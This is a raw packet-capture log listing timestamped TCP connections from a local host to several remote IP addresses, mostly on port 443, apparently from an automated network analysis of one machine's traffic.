            Nov 21, 2024 09:50:18.698903084 CET49767443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:18.698961973 CET4434976713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:18.699444056 CET49767443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:18.699456930 CET4434976713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:18.730436087 CET4434976513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:18.731121063 CET49765443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:18.731163025 CET4434976513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:18.731786966 CET49765443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:18.731797934 CET4434976513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:18.941514969 CET4434976413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:18.941596031 CET4434976413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:18.941751003 CET49764443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:18.942059994 CET49764443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:18.942060947 CET49764443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:18.942104101 CET4434976413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:18.942130089 CET4434976413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:18.945614100 CET49769443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:18.945663929 CET4434976913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:18.945749044 CET49769443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:18.946877003 CET49769443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:18.946898937 CET4434976913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.061393976 CET4434976613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.061582088 CET4434976613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.061661959 CET49766443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.061853886 CET49766443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.061907053 CET4434976613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.061938047 CET49766443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.061954975 CET4434976613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.065253019 CET49770443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.065289974 CET4434977013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.065371990 CET49770443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.065546989 CET49770443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.065557003 CET4434977013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.102284908 CET4434976813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.102354050 CET4434976813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.102520943 CET49768443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.102689028 CET49768443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.102689028 CET49768443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.102706909 CET4434976813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.102716923 CET4434976813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.106278896 CET49771443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.106333971 CET4434977113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.106405973 CET49771443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.106563091 CET49771443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.106581926 CET4434977113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.180804014 CET4434976713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.180896044 CET4434976713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.181159973 CET49767443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.181209087 CET49767443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.181209087 CET49767443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.181235075 CET4434976713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.181247950 CET4434976713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.185014009 CET49772443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.185055971 CET4434977213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.185249090 CET49772443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.185453892 CET49772443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.185466051 CET4434977213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.220066071 CET4434976513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.220238924 CET4434976513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.220319986 CET49765443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.220402956 CET49765443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.220403910 CET49765443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.220451117 CET4434976513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.220478058 CET4434976513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.224378109 CET49773443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.224419117 CET4434977313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:19.224488020 CET49773443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.224626064 CET49773443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:19.224638939 CET4434977313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:20.768316031 CET4434976913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:20.768989086 CET49769443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:20.769006968 CET4434976913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:20.769654989 CET49769443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:20.769663095 CET4434976913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:20.878504038 CET4434977013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:20.879493952 CET49770443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:20.879511118 CET4434977013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:20.880135059 CET49770443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:20.880141973 CET4434977013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:20.943770885 CET4434977113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:20.944386959 CET49771443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:20.944422960 CET4434977113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:20.945054054 CET49771443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:20.945065975 CET4434977113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:20.974822998 CET4434977213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:20.975570917 CET49772443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:20.975585938 CET4434977213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:20.976181030 CET49772443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:20.976186991 CET4434977213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.004782915 CET4434977313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.005409956 CET49773443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.005438089 CET4434977313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.005888939 CET49773443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.005893946 CET4434977313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.213809967 CET4434976913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.213994980 CET4434976913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.214118004 CET49769443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.214272976 CET49769443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.214298010 CET4434976913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.214313030 CET49769443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.214320898 CET4434976913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.218238115 CET49774443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.218281984 CET4434977413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.218379974 CET49774443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.218560934 CET49774443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.218584061 CET4434977413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.322310925 CET4434977013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.322386026 CET4434977013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.322500944 CET49770443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.322868109 CET49770443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.322886944 CET4434977013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.322902918 CET49770443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.322907925 CET4434977013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.326771021 CET49775443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.326827049 CET4434977513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.326910019 CET49775443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.327089071 CET49775443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.327100992 CET4434977513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.392962933 CET4434977113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.393042088 CET4434977113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.393095016 CET49771443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.393511057 CET49771443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.393543005 CET4434977113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.393559933 CET49771443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.393568993 CET4434977113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.397214890 CET49776443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.397260904 CET4434977613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.397331953 CET49776443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.397572041 CET49776443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.397593021 CET4434977613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.418514967 CET4434977213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.418680906 CET4434977213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.418737888 CET49772443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.418791056 CET49772443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.418807030 CET4434977213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.418818951 CET49772443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.418823957 CET4434977213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.421837091 CET49777443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.421868086 CET4434977713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.421931028 CET49777443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.422127008 CET49777443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.422139883 CET4434977713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.448667049 CET4434977313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.448832989 CET4434977313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.448893070 CET49773443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.448987007 CET49773443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.449007988 CET4434977313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.449019909 CET49773443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.449026108 CET4434977313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.452243090 CET49778443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.452306986 CET4434977813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:21.452370882 CET49778443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.452569962 CET49778443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:21.452588081 CET4434977813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.003854990 CET4434977413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.005722046 CET49774443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.005753040 CET4434977413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.006249905 CET49774443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.006259918 CET4434977413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.142646074 CET4434977713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.143583059 CET49777443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.143609047 CET4434977713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.144388914 CET49777443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.144395113 CET4434977713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.171823025 CET4434977813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.172245979 CET4434977513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.172741890 CET49778443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.172768116 CET4434977813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.173048019 CET49775443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.173074007 CET4434977513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.173146009 CET49778443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.173151970 CET4434977813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.173512936 CET49775443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.173517942 CET4434977513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.240811110 CET4434977613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.241688967 CET49776443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.241714001 CET4434977613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.242115974 CET49776443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.242120028 CET4434977613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.446491957 CET4434977413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.446578979 CET4434977413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.446784973 CET49774443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.446990013 CET49774443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.447014093 CET4434977413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.447025061 CET49774443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.447032928 CET4434977413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.450937033 CET49780443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.450993061 CET4434978013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.451085091 CET49780443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.451247931 CET49780443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.451261044 CET4434978013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.566140890 CET4972480192.168.2.4199.232.214.172
            Nov 21, 2024 09:50:23.577461958 CET4434977713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.577620983 CET4434977713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.577989101 CET49777443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.577989101 CET49777443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.577989101 CET49777443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.581052065 CET49781443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.581108093 CET4434978113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.581182003 CET49781443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.581325054 CET49781443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.581334114 CET4434978113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.655693054 CET4434977813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.655852079 CET4434977813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.656181097 CET49778443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.656208038 CET49778443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.656224966 CET4434977813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.656244993 CET49778443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.656250954 CET4434977813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.659427881 CET49782443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.659468889 CET4434978213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.659543037 CET49782443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.659735918 CET49782443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.659751892 CET4434978213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.667623997 CET4434977513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.667681932 CET4434977513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.667937040 CET49775443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.668008089 CET49775443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.668020964 CET4434977513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.668035984 CET49775443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.668041945 CET4434977513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.671022892 CET49783443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.671056032 CET4434978313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.671139002 CET49783443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.671282053 CET49783443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.671293020 CET4434978313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.685902119 CET8049724199.232.214.172192.168.2.4
            Nov 21, 2024 09:50:23.685961008 CET4972480192.168.2.4199.232.214.172
            Nov 21, 2024 09:50:23.693646908 CET4434977613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.693715096 CET4434977613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.693896055 CET49776443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.693929911 CET49776443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.693938017 CET4434977613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.693952084 CET49776443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.693957090 CET4434977613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.696702003 CET49784443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.696744919 CET4434978413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.696815014 CET49784443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.696993113 CET49784443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.697006941 CET4434978413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:23.800465107 CET49777443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:23.800519943 CET4434977713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.233091116 CET4434978013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.233779907 CET49780443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.233815908 CET4434978013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.234302998 CET49780443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.234308958 CET4434978013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.361959934 CET4434978113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.362622023 CET49781443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.362652063 CET4434978113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.363132954 CET49781443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.363142014 CET4434978113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.447460890 CET4434978213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.448108912 CET49782443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.448133945 CET4434978213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.448713064 CET49782443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.448719025 CET4434978213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.453337908 CET4434978313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.453957081 CET49783443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.453983068 CET4434978313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.454473972 CET49783443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.454483032 CET4434978313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.475197077 CET4434978413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.475830078 CET49784443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.475860119 CET4434978413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.476341009 CET49784443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.476349115 CET4434978413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.805115938 CET4434978113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.805187941 CET4434978113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.805301905 CET49781443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.805579901 CET49781443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.805600882 CET4434978113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.805610895 CET49781443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.805617094 CET4434978113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.809113026 CET49785443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.809165001 CET4434978513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.809267044 CET49785443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.809432983 CET49785443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.809447050 CET4434978513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.895467043 CET4434978213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.895550966 CET4434978213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.895803928 CET49782443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.895979881 CET49782443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.895979881 CET49782443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.896003962 CET4434978213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.896015882 CET4434978213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.896749973 CET4434978313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.896823883 CET4434978313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.896882057 CET49783443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.897507906 CET49783443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.897526979 CET4434978313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.897538900 CET49783443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.897545099 CET4434978313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.900548935 CET49786443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.900577068 CET49787443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.900595903 CET4434978613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.900629044 CET4434978713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.900679111 CET49786443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.900710106 CET49787443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.900862932 CET49786443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.900866032 CET49787443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.900876045 CET4434978613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.900880098 CET4434978713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.918699980 CET4434978413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.918768883 CET4434978413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.919034958 CET49784443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.919063091 CET49784443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.919075012 CET4434978413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.919086933 CET49784443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.919091940 CET4434978413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.922023058 CET49788443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.922065020 CET4434978813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:25.922159910 CET49788443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.922355890 CET49788443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:25.922372103 CET4434978813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:26.375627041 CET4434978013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:26.377125025 CET4434978013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:26.377218962 CET49780443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:26.377274990 CET49780443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:26.377274990 CET49780443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:26.377295971 CET4434978013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:26.377307892 CET4434978013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:26.380817890 CET49789443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:26.380858898 CET4434978913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:26.380932093 CET49789443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:26.381122112 CET49789443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:26.381134987 CET4434978913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:26.974801064 CET49735443192.168.2.4185.221.216.102
            Nov 21, 2024 09:50:26.974910975 CET44349735185.221.216.102192.168.2.4
            Nov 21, 2024 09:50:26.974992990 CET49735443192.168.2.4185.221.216.102
            Nov 21, 2024 09:50:26.975445032 CET49790443192.168.2.4142.250.74.196
            Nov 21, 2024 09:50:26.975493908 CET44349790142.250.74.196192.168.2.4
            Nov 21, 2024 09:50:26.975579977 CET49790443192.168.2.4142.250.74.196
            Nov 21, 2024 09:50:26.975858927 CET49790443192.168.2.4142.250.74.196
            Nov 21, 2024 09:50:26.975881100 CET44349790142.250.74.196192.168.2.4
            Nov 21, 2024 09:50:27.627233982 CET4434978513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:27.628266096 CET49785443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:27.628351927 CET4434978513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:27.629595995 CET49785443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:27.629611015 CET4434978513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:27.705112934 CET4434978813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:27.706010103 CET49788443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:27.706060886 CET4434978813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:27.706675053 CET49788443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:27.706686974 CET4434978813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:27.744592905 CET4434978613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:27.745243073 CET49786443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:27.745276928 CET4434978613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:27.745809078 CET49786443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:27.745815039 CET4434978613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:27.746701002 CET4434978713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:27.747159958 CET49787443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:27.747195005 CET4434978713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:27.747606039 CET49787443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:27.747616053 CET4434978713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:28.071793079 CET4434978513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:28.071968079 CET4434978513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:28.072161913 CET49785443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:28.072208881 CET49785443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:28.072208881 CET49785443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:28.072232962 CET4434978513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:28.072247028 CET4434978513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:28.075696945 CET49791443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:28.075814009 CET4434979113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:28.075926065 CET49791443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:28.076148033 CET49791443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:28.076178074 CET4434979113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:28.149115086 CET4434978813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:28.149188042 CET4434978813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:28.149347067 CET49788443192.168.2.413.107.246.45
